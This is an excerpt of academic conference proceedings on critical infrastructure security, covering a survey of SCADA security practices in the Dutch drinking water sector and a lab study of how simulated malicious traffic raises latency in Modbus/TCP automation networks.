In this paper, a method and a support tool for the quantitative security risk analysis of critical infrastructures have been described. The method has been developed to address the risk management of railway infrastructures mainly considering physical threats. However, we believe that the considerations on the base of the method do not limit its application to a specific infrastructure neither prevent the analysis of logical security. For instance, a site can be thought of as a logical point in which a hacker attack can be performed by exploiting one or more flaws. For attacks involving persons (injury or kill), a quantification of consequences, though possible, is not generally accepted. Therefore, qualitative approaches can be applied separately to such classes of threats. The Q-RA tool is also intended for the integration of qualitative analysis by means of associative tables [10]. The automation provided by the tool also eases the analysis of parametric sensitivity in order to assess how error distributions in the input values affect the overall results. Finally, it is possible to extend the tool with functionalities of cost/benefit optimization (e.g. by genetic algorithms), considering limited budget constraints. In such a way, the optimal set of protection mechanism minimizing the risk can be automatically determined.
References 1. Asis International: General Security Risk Assessment Guideline (2008), http://www.asisonline.org/guidelines/guidelinesgsra.pdf 2. Broder, J.F.: Risk Analysis and the Security Survey. Butterworth-Heinemann (2006) 3. Garcia, M.L.: Vulnerability Assessment of Physical Protection Systems. Butterworth-Heinemann (2005) 4. Lewis, T.G.: Critical Infrastructure Protection in Homeland Security: Defending a Networked Nation. John Wiley, Chichester (2006) 5. Meritt, J.W.: A Method for Quantitative Risk Analysis (2008), http://csrc.nist.gov/nissc/1999/proceeding/papers/p28.pdf
Quantitative Security Risk Assessment and Management
189
6. Moteff, J.: Risk Management and Critical Infrastructure Protection: Assessing, Integrating, and Managing Threats, Vulnerabilities and Consequences. CRS Report for Congress, The Library of Congress (2004) 7. Nicol, D.M., Sanders, W.H., Trivedi, K.S.: Model-based evaluation: from dependability to security. IEEE Transactions on Dependable and Secure Computing 1(1), 48–65 (2004) 8. SANDIA National Laboratories: A Risk Assessment Methodology for Physical Security. White Paper (2008), http://www.sandia.gov/ram/RAM%20White%20Paper.pdf 9. Srinivasan, K.: Transportation Network Vulnerability Assessment: A Quantative Framework. Southeastern Transportation Center - Issues in Transportation Security (2008) 10. U.S. Department of Transportation: The Public Transportation Security & Emergency Preparedness Planning Guide. Federal Transit Administration, Final Report (2003) 11. U.S. Department of Transportation: Transit Security Design Considerations. Federal Transit Administration, Final Report (2004) 12. Wilson, J.M., Jackson, B.A., Eisman, M., Steinberg, P., Riley, K.J.: Securing America’s Passenger-Rail Systems. Rand Corporation (2007)
Assessing and Improving SCADA Security in the Dutch Drinking Water Sector Eric Luiijf1 , Manou Ali2 , and Annemarie Zielstra2 1
TNO Defence, Security and Safety, Oude Waalsdorperweg 63, 2597 AK The Hague, The Netherlands
[email protected] www.tno.nl 2 ICTU programme National Infrastructure against Cyber Crime (NICC), Wilhelmina van Pruisenweg 104, 2595 AN The Hague, The Netherlands {manou.ali,annemarie.zielstra}@ictu.nl www.samentegencybercrime.nl
Abstract. International studies have shown that information security for process control systems, in particular SCADA, is weak. As many critical infrastructure (CI) services depend on process control systems, any vulnerability in the protection of process control systems in CI may result in serious consequences for citizens and society. In order to understand their strengths and weaknesses, the drinking water sector in The Netherlands benchmarked the information security of their process control environments. Large differences in their security postures were found. Good Practices for SCADA security were developed based upon the study results. This paper will discuss the simple but effective approach taken to perform the benchmark, the way the results were reported to the drinking water companies, and the way in which the SCADA security good practices were developed. Figures shown in this paper are based on artificially constructed data since the study data contain company and national sensitive information.
1 Introduction 1.1 The Dutch National Infrastructure (against) Cyber Crime In our digital world, we want to be able to work securely. Protection is the key to this. Certainly there is a need to investigate and prosecute cybercrime, but a reactive response alone is not the complete solution. Only when government, investigatory authorities and the private sector join forces and exchange information about new threats, society will be able to keep up with the cyber criminals. Embracing the principle of ’learning by doing’, the Dutch government and the private sector took the first steps towards developing a successful strategy against cybercrime in 2006 with the establishment of the National Infrastructure against Cybercrime programme (Nationale Infrastructuur ter bestrijding van Cybercrime (NICC)). The NICC infrastructure consists of several components: a contact point, reporting unit, trend watching, monitoring and detection, information distribution, education, warning, development, knowledge sharing, surveillance, prevention, termination, and mitigation. The NICC further strengthens this infrastructure R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 190–199, 2009. c Springer-Verlag Berlin Heidelberg 2009
Assessing and Improving SCADA Security in the Dutch Drinking Water Sector
191
by hosting the Cybercrime Information Exchange, in which public and private organizations share sensitive information, and by developing and supporting practical projects and trials that both solve concrete problems and generate knowledge about cybercrime. The Cybercrime Information Exchange information-sharing model is based on the one designed by the UK’s Centre for the Protection of National Infrastructure (CPNI). The NICC Information Exchange function can be pictured as a ’flower’. The heart of the flower is made up of government bodies, like the police, intelligence services, GOVCERT.NL and the NICC itself. Critical infrastructure (CI)sectors and some other major industrial communities that heavily rely upon ICT can be thought of being the petals of the flower. The different sectors chair their own ’petal’, decide which parts of the meeting can be attended by the government bodies and decide upon which information is sharable outside their sector ’petal’. The confidentiality of their exchanged information is maintained by an agreed set dissemination rules following the Traffic Light Protocol [1]. 1.2 The Dutch Drinking Water Sector The current Dutch drinking water sector originates from extensive mergers of local municipally utilities. In 1952, The Netherlands society was serviced by 198 drinking water companies, a number that has reduced to ten companies by 2007 [2]. After 9/11 2001, the Dutch drinking water sector collaboratively undertook major efforts to increase the physical security of their drinking water plants and systems. When the NICC was established in 2006, the drinking water sector was one of the first CI sectors to sign up as a sector petal to address their cyber risk. One of the information security issues they put onto the NICC agenda concerns SCADA security. SCADA means Supervisory Control and Data Acquisition, a term which is used in this paper as an overarching term for all process control systems and networks that are used to control the collection of raw water, the purification process, the drinking water quality, and the transport and distribution of the drinking water to the customers. Together with the NICC, the drinking water sector decided for a project that has to (1) investigate the current sector-wide state of SCADA information security, (2) analyze and report the results, and (3) develop a set of good practices which provides a sector-wide information security baseline for the SCADA/process control environment. 1.3 Outline In Section 2, we will discuss the development of a questionnaire that has been used to investigate the SCADA security posture of the drinking water sector. In Section 3 we will highlight the analysis approach and the way the results were reported to the drinking water sector while maintaining anonymity. Obviously, the individual company information and the sector-wide results are classified. In Section 4, however, we are able to present a high level overview of the main areas of SCADA security concerns that were identified in the Dutch drinking water sector. As requested by the drinking water sector NICC-petal, a SCADA Security Good Practices report has been developed addressing these security weaknesses. Its development is described in Section 5. Section 6 contains the conclusions.
192
E. Luiijf, M. Ali, and A. Zielstra
2 Investigation Approach by Questionnaire To investigate the current state of SCADA information security in the drinking water sector, a four page questionnaire with about forty open and closed questions has been developed covering the main areas of security concern that were derived from general SCADA security issues reported in [3] and were inspired by documents like [4]. The main areas addressed by the questionnaire are: (1) the drinking water company security policies and security posture, (2) information security architecture aspects, and (3) operational and system management issues. Fifteen questions specifically address the organization and its security posture covering aspects like the security policy for SCADA (if any), how it relates to the general company information security policy and implementation, and how it relates to physical security. Other aspects discuss various controls as mentioned in the ISO/IEC Code of Practice for information security management [5], the use of security standards, and whether regularly audits take place or not. Another fourteen questions address the information security architecture for the SCADA environment. They focus on the security of information transfers and communication. Areas covered are physical and logical separation of the SCADA environment and the office automation environment, secure communication with remote locations, types of communication technologies in use, remote access, third party access to the infrastructure, etceteras. The remaining ten questions address operational and system management issues such as the way the organization deals with the security awareness of its own and third party personnel, password change policies, EDP-audit, earlier reported incidents (if any and if one wants to report them), business continuity plans, and patch and malware policies. All drinking water companies participating in the NICC drinking water petal were asked to fill in the questionnaire. The NICC supported this process by a face-to-face meeting to clarify any questions that could arise from the questionnaire. As two of the Dutch drinking water companies share their information and communication technology (ICT) and SCADA services, a joint answer for two companies was returned. Two companies returned their questionnaire late causing their results not to taken into account of the analysis described in Section 3. Their results were processed afterwards. To protect the completed questionnaires with sensitive company information, they are classified ”NICC Confidential” and are handled and stored accordingly.
3 Analysis and Reporting A simple spreadsheet was developed to contain and visualize the answers given to the questions in the questionnaire. Random assigned numbers to the ten Dutch drinking water companies gave the basis for anonymous treatment of the returned questionnaires. A randomly assigned company number to each individual drinking water company maps their replies in the returned questionnaire to a specific column in the analysis spread sheet. The mapping between the companies and the randomly assigned numbers is stored in a vault together with the returned questionnaires. This approach guarantees
Assessing and Improving SCADA Security in the Dutch Drinking Water Sector
193
One drinking water company uses a single, combined network for both the SCADA operations and the office automation systems. Risk: This is a very risky way of operating SCADA systems. Any technical failure in one of the office automation systems or malware such as a virus or Trojan horse may stop the SCADA system. Such failures with serious consequences have been reported in the last years by the power and petrochemical sectors. Fig. 1. Report example for process control and office automation network entanglement (artificial example)
the anonymous analysis of the returned questionnaire data and the protection of the sensitive data of the individual companies. The returned data was analyzed first from a sector-wide view. The analyzed results have been reported back to the drinking water sector in a classified NICC report. For each of the potential weak twenty-one security areas, a pie or bar chart provides a sector-wide insight in the number of companies that have given a certain reply. An artificial example in shown in Figure 1. An explanation with each of the charts discusses both the (result) status and the potential risk related to a certain answer. In order to raise awareness, each of the paragraphs describing potentially very insecure behavior is accompanied by a red flag symbol. In the same way, a yellow flagged paragraph denotes some security risk, and green flags denoting a secure way of operations. The method using questionnaires, however, has the risk that the outcome may point to a certain risky behavior by a drinking water company. Such a risk, however, may have been mitigated by a set of additional security measures which were not mentioned by the respondents. On the other hand, such alternate security measures may not fully take away the high risk. As none of the drinking water companies objected to the draft analysis report, sets of such additional measures do not exist at all or at least are not common. Another risk of using the method of questionnaires could be that the companies would not give sincere answers. The set-up of the questionnaire with a mix of open and closed questions covertly tried to detect such insincere answers. The analysis of all answers did not expose any insincerity. The answers certainly exposed serious
194
E. Luiijf, M. Ali, and A. Zielstra
Fig. 2. Radar chart showing eight organizational security policy issues (artificial example) showing the minimum and average sector performances
weaknesses within each of the companies. Moreover, the answers to question about what risk would keep the manager awake often showed that they were worried about certain bad practices reported elsewhere in the questionnaire. Therefore, both the questionnaire as elicitation method and the way we reported the observed risky behaviors back to the drinking water sector has proved to be a simple, but effective method. In addition to the individual issues, three comprehensive radar charts present the sector-wide current security posture respectively showing eight organizational security policy and management issues, six communication and networking issues, and five system and security management issues. Figure 2 shows an artificial radar chart example for the organizational security policy and management issues. Each of these radar charts shows the sector-wide average and the worst individual company performance. Each metric value is derived from an expert judgment on the security risk for the specific metric expressed as a number between zero (worst, totally insecure score) and one (perfect security). For this expert judgment, several TNO security experts with a background in process control security and general information security discussed the specific security issue and came to a consensus about a metric value for each of the possible answers for that issue without knowing beforehand what the companies had replied. For instance, a zero would be given to a drinking water company when having a combined SCADA/process control and office automation network, a 0.4 for shared logically separated trunks (e.g., VPNs) between two office/plant locations, and a one (perfect score) for physically and logically separated office and process control networks. This whole process was intended to be light-weighted resulting
Assessing and Improving SCADA Security in the Dutch Drinking Water Sector
195
Fig. 3. The drinking water sector ’school report’ (artificial example)
in indicative, but objective results that could help the drinking water companies to identify the areas with their highest vulnerabilities. In order to benchmark the various drinking water companies against each other with respect to SCADA and process control security, ’school report’ figures are calculated for their overall organizational security policy, communication and networking security, and system and security management security postures. Each of the respective eight, six and five metrics is multiplied with a relative weight and totaled for each of the three areas organizational security policy, communication and networking security, and system and security management. A ten is the perfect score, a zero is the least score possible. Again, the respective weight values were determined by consensus of several security experts about the relative importance of the axis categories per issue area (radar chart). The overall score is simply the sum of the figures of each of the three areas divided by three (see artificial example in Fig. 3). The analysis results, the sector-wide radar charts, and a chart with all the individual, but anonymous, ’school report’ figures have been presented in a NICC meeting to the drinking water sector representatives. The approach allowed an open discussion without anyone being the best or the worst one in class. At the end of the meeting, all representatives received a closed envelope with radar charts showing their individual company results which could be compared with the sector average and minimum performances. The envelope contained also the school report chart stating which anonymous company number was theirs.
196
E. Luiijf, M. Ali, and A. Zielstra
4 Areas of SCADA Security Concern For obvious reasons, the individual company and detailed sector-wide results are classified. In general, however, we can discuss SCADA security good practices and some of the concerns regarding the current security posture of some of the SCADA and process control systems in the drinking water sector. 4.1 General Observations When considering the sector-wide results, we found that some drinking water companies are performing far better than the sector average. But, even for the best in class companies, the individual radar charts sometimes show a black spot in controlling their security risk. These black spots are easy to spot as they are visible as missing pies in the radar graphs. For that reason, the three radar charts help the responsible managers (general company management, network and telecommunication management, and process control technical management respectively) to focus on such weak areas in their individual drinking water company. The cross-sector school report chart shows large individual company variances with regard to the sector averages. This caused the drinking water sector to ask for the development of a set of SCADA Security Good Practices. Moreover, we learned that the school report has been used as a means to leverage board room attention and support for immediate action to improve the SCADA security posture in some of the participating drinking water companies. 4.2 Organizational Aspects and Organizational Policy Issues A good practice for companies is to use the ISO/IEC Code of Practice for information security management [5] as a basis for information security management. All companies in the Dutch drinking water sector use the Code of Practice or a derivative thereof in their office automation environment. In the process control domain, however, the use of this Code of Practice is not yet very common. When applied, no specific SCADA policies extending the ISO/IEC 17799/27002 [5] controls dealing with specific process control issues such as 24/7 operations [6,7] have been found. According to [5], security awareness processes for all ICT-users shall be in effect. For the process control environment (operators, system managers, automation personnel), such security awareness programs are not common practice yet. Another good practice is to state one’s security requirements when acquiring new hardware, software, and related maintenance and support services. For the SCADA domain the drinking water sector results show that this is a black spot. We expected that the increasing importance of risk management frameworks such as, e.g., Sarbanes-Oxley, would cause the SCADA risk to be recognized as a business risk to be managed by the top management level of the drinking water companies. It turned out that this is not the case yet. For that reason, the lack of a regularly (yearly) EDP audit of the SCADA process control environment was reported by most companies. Considering the Dutch penal law, this may cause the prosecution of possible cyber crime in the SCADA environment of those companies to be hampered. Moreover, the lack of
Assessing and Improving SCADA Security in the Dutch Drinking Water Sector
197
a regular external security audit may decrease management attention for a proper, to the business risk related, security posture. Fortunately, it can be concluded that most drinking water companies have taken redundancy and other business continuity measures for their SCADA environment, although some companies have not yet discussed priority deliveries with their hardware suppliers in case of a major loss of equipment. 4.3 Networking and Telecommunication A good practice is to strictly separate the office automation and the SCADA environments and to have a strictly controlled data exchange between these environments, if required at all. The worst network architecture case is a mixed office automation and SCADA network where a simple disturbance in the office automation hardware and software may bring down all SCADA operations, e.g. due to a malfunctioning network interface card. Also, a remote operations link which mix both types of traffic may cause a loss of SCADA operations when the office automation traffic load across the link becomes extremely high (overload), e.g. as a result of a malware attack (ref. [3]). Unfortunately, such architectural errors were reported by the drinking water sector. Another good practice is that remote access to the SCADA environment shall be avoided at all times, or at least be under strict security scrutiny. The reality is that most drinking water companies allow remote access by own personnel and personnel of their suppliers for trouble shooting. The risk stemming from such remote access is not always balanced with an appropriate set of security measures. Most of the drinking water companies allow personnel of third parties such as SCADA manufacturers to connect equipment such as laptops to the operational SCADA network without any oversight or pre-conditions. Remarkable about this is that the managers responsible for the SCADA domain reported that they are worried at night about potential malware brought into the system by third party personnel! 4.4 System and Security Management The ISO/IEC Code of Practice [5] requires that system management keep their systems up to date with respect to their security. A security patching policy and anti-malware measures are nowadays common in the office automation domain to meet the Code of Practice requirements. As was already reported by [3], this is not a common practice in the SCADA environment. The Dutch drinking water sector shows a same behavior. Patches are often only applied reluctantly; even the SCADA/process control vendors sometimes need to apply pressure to get security holes to be patched. The ISO/IEC Code of Practice [5] has a strict set of controls for password management. Earlier reports on SCADA security, e.g. [3], state that this area is weak in the control system environment. Not surprisingly, unchanged default passwords, no individual passwords, and an infinite long password change frequency have been found. On the other hand, some drinking water companies have overcome the 24/7 barriers, abandoned group passwords and use frequently changing individual passwords. Within the NICC drinking water petal, such drinking water companies are invited to present
198
E. Luiijf, M. Ali, and A. Zielstra
their way of operations as a stepping stone for their colleagues to implement the same secure password policies.
5 Development of the SCADA Security Good Practices Based upon the results of the analysis described in the previous sections, security expert experiences, and existing literature such as [3] through [7], SCADA Security Good Practices for the Drinking Water Sector were developed. Both a version in Dutch [8] and in English [9] has been developed. These good practices documents start with a short introduction to SCADA and process control, its vulnerability, and some examples of SCADA failures affecting drinking water systems. The document continues outlining eleven good practices for the company management and 28 good practices for the technical process automation management.
6 Conclusions A relative straightforward and effective approach has been taken to assess, analyze, and help to improve the sector-wide SCADA and process control security posture in The Netherlands. The approach included a way to assure the anonymity of the individual drinking water company inputs and their individual scores while being able to discuss the information security weaknesses in a sector-wide setting. The individual results of the drinking water companies have been presented in a way that allows them to discuss their security posture performance relative to the sector averages in their organization’s board room. SCADA Security Good Practices have been developed which allow the drinking water sector to enhance their security posture. Using radar chart views, detailed discussions on the risk they take and the good practices to mitigate the risk, drinking water companies can compare their current security state with the drinking water sector average. As the analysis phase findings for the drinking water sector match the vulnerabilities described in earlier documents like [3] and [4], the developed good practices may be of use to (1) the drinking water sector in other nations, and (2) other alike critical sector services applying the same technologies (e.g., waste water, sewage). Due to the successful results in the drinking water sector, the same questionnaire will be used as a basis to perform similar investigations in the Dutch energy sector and in the Rotterdam harbor in the first half of 2008. Comparison of the drinking water and energy sector results shows a number of simularities in the SCADA/process control security weaknesses in both sectors.
Acknowledgements The national study [3] on the vulnerability of process control systems at large and SCADA in particular was commissioned by the Dutch Ministry of Economic Affairs. The study on SCADA information security in the drinking water sector was commissioned by the National Infrastructure (against) Cyber Crime (NICC) programme of the ICTU (www.ictu.nl).
Assessing and Improving SCADA Security in the Dutch Drinking Water Sector
199
References 1. CPNI, Traffic Light Protocol (TLP) (2005) 2. VEWIN, http://www.vewin.nl (last visited March 24, 2008) 3. Luiijf, H.A.M., Lassche, R.: SCADA (on)veiligheid, een rol voor de overheid? [SCADA (in)security, a role for the Government?], TNO/KEMA report, [Unclassified] (June 2006) 4. Department of Energy (DoE), 21 Steps to Improve Cyber Security of SCADA Networks, Office of Energy Assurance, Office of Independent Oversight And Performance Assurance, U.S. Department of Energy, USA (2005), http://www.oe.netl.doe.gov/docs/prepare/21stepsbooklet.pdf8 5. ISO, Code voor Informatiebeveiliging/Information technology - Security techniques - Code of practice for information security management framework, ISO/IEC 17799:2005. This standard will be renamed to ISO/IEC 27002 6. EWICS TC7, A Study of the Applicability of ISO/IEC 17799 and the German Baseline Protection Manual to the Needs of Safety Critical Systems. European Workshop on Industrial Computer Systems - Executive Summary (March 2003), http://www.ewics.org/attachments/roadmap-project/ RdMapD31ExecSummary.pdf 7. EWICS TC, A Study of the Applicability of ISO/IEC 17799 and the German Baseline Protection Manual to the Needs of Safety Critical Systems. European Workshop on Industrial Computer Systems (March 2003), http://www.ewics.org/attachments/roadmap-project/RdMapD31.pdf 8. Luiijf, H.A.M.: SCADA Good Practice voor de Nederlandse Drinkwatersector, report TNO DV2007 C478 (December 2007) [Dutch version; Restricted distribution] 9. Luiijf, H.A.M.: SCADA Security Good Practices for the Dutch Drinking Water Sector, report TNO DV 2008 C096 (March 2008) [English version]
Analysis of Malicious Traffic in Modbus/TCP Communications Tiago H. Kobayashi, Aguinaldo B. Batista Jr., Jo˜ ao Paulo S. Medeiros, Jos´e Macedo F. Filho, Agostinho M. Brito Jr., and Paulo S. Motta Pires LabSIN - Security Information Laboratory Department of Computer Engineering and Automation - DCA Federal University of Rio Grande do Norte - UFRN Natal, 59.078-970, RN, Brazil {hiroshi,aguinaldo,joaomedeiros,macedofirmino,ambj,pmotta}@dca.ufrn.br
Abstract. This paper presents the results of our analysis about the influence of Information Technology (IT) malicious traffic on an IP-based automation environment. We utilized a traffic generator, called MACE (Malicious trAffic Composition Environment), to inject malicious traffic in a Modbus/TCP communication system and a sniffer to capture and analyze network traffic. The realized tests show that malicious traffic represents a serious risk to critical information infrastructures. We show that this kind of traffic can increase latency of Modbus/TCP communication and that, in some cases, can put Modbus/TCP devices out of communication. Keywords: Critical Information Infrastructure Protection, Malicious Traffic Analysis, Threats and Attacks to AT Infrastructures, Automation Technology Security.
1
Introduction
The information security concern in Automation Technology (AT) environment has been a common topic of interest in the industry. This concern comes mainly with the security issues related with the interconnection between SCADA and corporate networks as discussed in several works [1,2,3]. Some other works propose feasible solutions to address these security problems [4,5,6,7]. Information security has become an important matter also because TCP/IP (Transmission Control Protocol/Internet Protocol) has been used as basis of many current automation protocols like Modbus/TCP, DNP3 over TCP, Ethernet/IP (Ethernet/Industrial Protocol) among others. This fact brings to the AT sector some TCP/IP weakness and vulnerabilities, including information security threats that can be caused by a weak TCP/IP stack implementation of devices. In this paper, we intend to assess the risks that common IT (Information Technology) threats can bring to critical infrastructures. We work with the hypothesis of having an unprotected IP-based automation network compromised by common IT malicious traffic. Our focus is a Modbus/TCP automation network because Modbus/TCP is a commonly used protocol in this environment. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 200–210, 2009. c Springer-Verlag Berlin Heidelberg 2009
Analysis of Malicious Traffic in Modbus/TCP Communications
201
Modbus/TCP is a TCP/IP variation of Modbus protocol which encapsulates slightly modified Modbus serial frames into TCP segments. We analyze the influence of IT malicious traffic over Modbus/TCP transactions between Modbus/TCP clients and a Modbus/TCP-enabled Programmable Logic Controller (PLC) acting as a Modbus/TCP server. PLCs are control devices widely used in industrial automation critical infrastructures. The analysis consists basically in the usage of two well known network latency measurement methods, Round-Trip Time (RTT) and TCP Time-sequence Graph to evaluate how malicious traffic can be harmful to AT communications. The remainder of this paper is organized as follows. The next section presents some related works that approach to the influence of malicious traffic in IT environment. Section 3 presents the methods and testbeds utilized in our experiments. In Section 4, we describe the experiments realized and discuss results. Finally, in Section 5, we conclude our work with some final considerations and suggestions for future works.
2
Related Works
There are several works that discuss about the influence of malicious traffic in IT networks. Mirkovic [8] presents a study about the influence of Denial of Service (DoS) attack over communications between IT devices. In his work, he proposes a metric for measuring the DoS impact on various network applications considering some parameters as request/response delays, packet loss, and delay variation. The realized tests utilized known protocols such as HTTP, FTP, Telnet, ICMP and DNS. The DoS attacks utilized in the tests were based in UDP flood and TCP SYN flood. Another work presents an analysis of the effect of malicious traffic based in the latency of DNS and HTTP communications [9]. This analysis showed that there is an increase in the average latency of these protocols when the network is submitted to Distributed Denial of Service (DDoS) attack traffic. This work shows that the latency may be used as a parameter to analyze the effects of malicious traffic. Our paper makes an analysis about the influence of this traffic in AT networks, showing that there is the necessity for the use of security techniques to avoid undesirable threats and performance losses.
3
Method
In this section we present our approach to the investigation of malicious traffic effects in AT network. We utilized a malicious traffic generator, called MACE (Malicious trAffic Composition Environment) [10], to inject traffic into Modbus/TCP communication. MACE provides the basic building blocks for recreating a large set of known attacks, viruses and worms traffic. So, it can simulate the behavior of common malicious traffic that affects IT networks.
202
T.H. Kobayashi et al.
In this work, MACE was used as a performance benchmarking tool that helped the analysis of the Quality of Service (QoS) degradation in a Modbus/TCP network. This QoS degradation was expressed in this work by two TCP latency measurement techniques: – Round-Trip Time (RTT): is the measure of the time of packet’s travel across a network. It measures the time a packet takes to travel from the sender to the receiver plus the time its response takes to get into the sender. The RTT of TCP segment is defined as the time it takes for the segment to reach the receiver and for a segment carrying the generated acknowledgment to return to the sender [11]. This technique may express the latency of TCP communications. – TCP Time-sequence Graph: is a plot of the starting TCP sequence number in a segment versus the time that the segment was sent [12]. It is a reasonable way to visualize the flow of a TCP connection in relation to time. This graph can indicate segment delays and retransmissions in a TCP connection. We intend to use these measurements to infer some considerations about the influence of malicious traffic over Modbus/TCP communication. 3.1
Testbeds
We establish two testbeds to illustrate different situations. The first situation represents a case where an infected Modbus/TCP client communicates with the server. In this situation we want to analyze the influence of IT malicious traffic generated by the client over its own connection with the server. In the second situation, two clients are communicating with a Modbus/TCP server, but one of them injects malicious traffic in the network. In this situation we are intended to analyze the influence of the traffic generated by a client over the connection of another client. The first situation is represented by the testbed shown in Figure 1. In this testbed, we have a PC running a Modbus/TCP client and MACE, another PC
Fig. 1. Testbed 1 - A Modbus/TCP client running MACE, a traffic monitor and a PLC
Analysis of Malicious Traffic in Modbus/TCP Communications
203
Fig. 2. Testbed 2 - Two clients (one of them running MACE), a traffic monitor and a PLC
running a sniffer as a monitor and the Modbus/TCP PLC module connected to the same switch. This switch was configured to replicate the traffic between the client and the server to the monitoring computer. The second situation is represented by the testbed illustrated in Figure 2. This testbed differs from the first only by the existence of a second client running only the Modbus/TCP client (Client 1). 3.2
Tools
The Modbus/TCP clients utilized in both testbeds have a particularity of establishing an unique TCP connection with PLC module to permanently send the same Modbus/TCP packet until the connection get closed by the client. To do this, we modified our Modbus/TCP packet manipulation software [13] in order to analyze the influence of malicious traffic over a specific TCP connection. For monitoring the traffic in network, we used a well known network sniffer, named Wireshark [14]. It was used to capture and analyze the Modbus/TCP traffic between clients and the server. Wireshark is featured of a set of function for statistic analyses of several network protocols. As Modbus/TCP utilize TCP/IP stack, we have to make statistic analyses of the TCP connection that carries Modbus/TCP transactions. We use these Wireshark ’s functions to analyze RTT and to build the TCP Time-sequence Graph.
4
Experiments and Results
The experiments were realized under the described testbeds and Wireshark was used to plot RTT samples and TCP Time-sequence Graph. Figure 3 shows the
204
T.H. Kobayashi et al.
Fig. 3. RTT graph of a Modbus/TCP communication under Testbed 1
RTT graph of an active Modbus/TCP communication in Testbed 1 without the presence of malicious traffic. As we can see, no RTT samples exceeded 0,010 seconds. This was used to compare with Modbus/TCP communication affected with malicious traffic. After that, under the same testbed, we captured the network traffic in the presence of Blaster worm [15] traffic in network to make a comparison with the malicious traffic-free one. Figure 4 presents the RTT graph of Modbus/TCP communication with injection of Blaster traffic in the network. This figure shows a slight increase in RTT values but the maximum values also did not exceed 0,010 seconds. We configured MACE in the client to inject traffic of 21 common threats in the network in order to simulate the network traffic generated by an extremely infected Modbus/TCP client computer. Figure 5 shows the RTT behavior of this traffic. In this case, RTT values were significantly increased and some RTT values reached approximately 25 seconds. TCP Time-sequence analysis of the traffic with 21 common threats is presented in Figure 6. It shows that there were delays on TCP segments despatch. A delay-free traffic graph would show an increasing straight line. For Testbed 2, the tests were realized the same way as in Testbed 1. With the help of this testbed we intend to analyze the influence of an infected Modbus/TCP client over the communication of a non-infected one. The RTT behavior for the two non-infected clients is similar as shown in Figure 3. Figure 7 shows the RTT behavior of Client 1 when the Client 2 injects the oshare [16] attack traffic in the network. This graph shows a general increase of RTTs with maximum values reaching up to 3 seconds. We decided to show
Analysis of Malicious Traffic in Modbus/TCP Communications
205
Fig. 4. RTT graph of a Modbus/TCP communication in presence of Blaster worm traffic under Testbed 1
Fig. 5. RTT graph of Modbus/TCP communication in presence of 21 common threats under Testbed 1
this graph because, in our tests, the oshare attack was the only which affected considerably the communication between Client 1 and Modbus/TCP module. Figure 8 presents the TCP Time-sequence Graph for Client 1 when Client 2 injects oshare traffic in the network. It is possible to note the delays in the
206
T.H. Kobayashi et al.
Fig. 6. TCP Time-sequence Graph of Modbus/TCP communication in presence of 21 common threats under Testbed 1
Fig. 7. RTT graph for Client 1 traffic under Testbed 2 (Client 2 injecting traffic of oshare attack)
despatch of TCP segments from Client 1 caused by malicious traffic injected in the network by Client 2. A normal traffic graph for Client 1 would show an increasing straight line.
Analysis of Malicious Traffic in Modbus/TCP Communications
207
Fig. 8. TCP Time-sequence Graph for Client 1 under Testbed 2 (Client 2 injecting traffic of oshare attack)
Fig. 9. RTT graph for Client 1 under Testbed 2 (Client 2 injecting traffic of 20 common threats excluding oshare)
In another experiment, we configured MACE in Client 2 to inject malicious traffic of 20 common threats (without oshare). In this case, the RTT graph for Client 1 (macilious traffic-free) shows similar RTT values in comparison with
208
T.H. Kobayashi et al.
Fig. 10. TCP Time-sequence Graph for Client 1 under Testbed 2 (Client 2 injecting traffic of 20 common threats excluding oshare)
the RTT values obtained with oshare alone. Figure 9 illustrates the RTT graph for Client 1 when Client 2 injects malicious traffic in the network. TCP Time-sequence Graph for Client 1 utilizing the same 20-threat traffic is shown in Figure 10. This graph behavior is similar to the graph obtained by injecting only oshare attack traffic. Observing the last graphs, we can conclude that some threats alone can be as harmful as a set of other threats. Another important observation is that in some tests with MACE, the Modbus/TCP PLC module got out of communication. As we can verify in Figure 10, in the end of the curve, Client 1 started to retransmit a TCP segment, showing that there were no response from Modbus/TCP module.
5
Final Considerations
This work presented an analysis of IT malicious traffic influence in AT networks, specially the Modbus/TCP-based ones. IT malicious traffic can increase the normal latency of AT networks and in some cases can put automation devices out of communication. This fact attests how harmful IT malicious traffic can be to AT networks, where time in most cases is critical and devices perform delicate tasks. Future works under this approach will consider the use of real threats to validate the results obtained in this work with MACE. It would be convenient to setup a more realistic testbed which would represent, for example, a more complex system with corporate and automation networks interconnected. This same test procedure utilized in this work may be appropriate to evaluate the influence of IT traffic in other IP-based automation networks.
Analysis of Malicious Traffic in Modbus/TCP Communications
209
The influence of malicious traffic in AT networks may justify the utilization of IT security techniques also in AT networks. The use of VPN (Virtual Private Networks) and firewalls would constitute feasible countermeasures to minimize the effects of IT malicious traffic in AT environments. However, the utilization of such techniques may also introduce some delays and so, an appropriate performance analysis would be required before their application in AT environments.
Acknowledgements The authors would like to express their gratitude to the Department of Computer Enginearing and Automation, Federal University of Rio Grande do Norte and REDIC (Instrumentation and Control Research Network) for supporting this work. Also the authors would like to thank you Dr. J. Sommers for supplying us with a copy of MACE software.
